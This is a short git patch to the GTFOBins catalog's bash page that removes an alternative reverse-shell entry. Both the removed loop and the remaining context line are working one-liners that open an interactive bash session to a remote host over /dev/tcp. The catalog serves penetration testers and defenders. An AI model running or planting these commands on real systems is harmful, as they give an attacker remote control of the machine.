From 1e34dacceeacac9054dc0b3767a1896882922165 Mon Sep 17 00:00:00 2001 From: Emilio Pinna Date: Tue, 22 May 2018 19:10:17 +0100 Subject: [PATCH] Remove alternative bash reverse-shell --- _gtfobins/bash.md | 4 ---- 1 file changed, 4 deletions(-) diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md index 0084760..da1b81d 100644 --- a/_gtfobins/bash.md +++ b/_gtfobins/bash.md @@ -38,8 +38,4 @@ functions: RHOST=10.0.0.1 RPORT=8000 bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1 - - code: | - RHOST=10.0.0.1 - RPORT=8000 - exec 5<&-;exec 5<>/dev/tcp/$RHOST/$RPORT; while read line 0<&5; do $line 2>&5 >&5; done ---